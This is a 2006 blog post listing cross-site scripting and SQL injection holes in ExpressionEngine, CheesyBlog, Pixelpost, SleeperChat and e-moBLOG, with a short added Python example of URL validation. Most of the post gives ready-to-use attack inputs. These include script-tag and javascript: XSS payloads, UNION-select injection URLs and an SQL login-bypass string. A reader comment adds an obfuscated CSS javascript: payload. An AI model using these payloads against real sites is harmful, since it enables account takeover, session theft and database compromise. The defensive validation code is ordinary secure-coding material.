ecoestadistica.com

Tuesday, January 24, 2006

Vulnerabilities...

ExpressionEngine 'Referer' XSS

Example HTTP query:

GET /path/index.php HTTP/1.0
Host: host
Referer: http:///XSS>.com/;

--------------------------------------------------------------
CheesyBlog XSS Vulnerability

XSS example:

http://host/cheesyblog/archive.php?entry=1

Add a comment

Your name: XSS
Your email address: anything
Website URL: javascript:[code]
Comment: XSS
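
The comment form above accepts a `javascript:` URI in the Website URL field. The following is an added example, not CheesyBlog's own code: a server-side check that allows only http(s) links and escapes the name and URL before they reach the page. It is written in Python for illustration; the function names and sample inputs are constructed.

```python
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # javascript:, data:, vbscript: etc. fall outside
# Browsers ignore tab/CR/LF inside a URL, so "java\tscript:" still executes.
# Reject any control character or space instead of trying to repair the value.
_FORBIDDEN = re.compile(r"[\x00-\x20\x7f]")

def safe_website_url(raw):
    """Return an HTML-attribute-safe http(s) URL, or None if it must be rejected."""
    if not isinstance(raw, str) or len(raw) > 2048:
        return None
    url = raw.strip()
    if not url or _FORBIDDEN.search(url):
        return None
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:                # malformed authority, e.g. broken IPv6 literal
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return None                   # also rejects scheme-relative "//host/..."
    return html.escape(url, quote=True)

def render_commenter(name, website):
    """Render the commenter's name, linked only when the URL passed the check."""
    safe_name = html.escape(name, quote=True)
    href = safe_website_url(website)
    if href is None:
        return safe_name
    return '<a href="%s" rel="nofollow noopener">%s</a>' % (href, safe_name)

if __name__ == "__main__":
    # Constructed sample inputs
    for name, site in [("Ana", "http://example.org/"),
                       ("XSS", "javascript:alert(1)"),
                       ("<b>x</b>", "java\tscript:alert(1)")]:
        print(render_commenter(name, site))
```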

--------------------------------------------------------------

Pixelpost Photoblog XSS Vulnerability

http://host/pixelpost/index.php?popup=comment&showimage=1

Add a comment: XSS

--------------------------------------------------------------

SleeperChat Input Validation Hole Permits Cross-Site Scripting Attacks

http://www.sitevuln.com/chat/index.php?pseudo=%3E%3Cscript%3Ealert(navigator.appVersion)%3C/script%3E&txtlen=500&smiley=1

--------------------------------------------------------------

e-moBLOG Input Validation Bugs Permit SQL Injection Attacks

1. SQL injection example:

http://host/emoblog/index.php?monthy=2006017'%20union%20select%201,2,3,4,5,6,7,8,9,10/*#1

2. SQL injection example:

link: http://host/emoblog/admin/index.php
username: aaa' union select 'bbb','[md5 hash of any password]'/*
password: [anything]

Regards

1 comment:

Anonymous said...

anytag
style="background:url("javascri\Dpt:/*/**/(function a()
{alert('JavaScript es ejecutado.')})();");"
/

January 25, 2006 1:04 p.m.
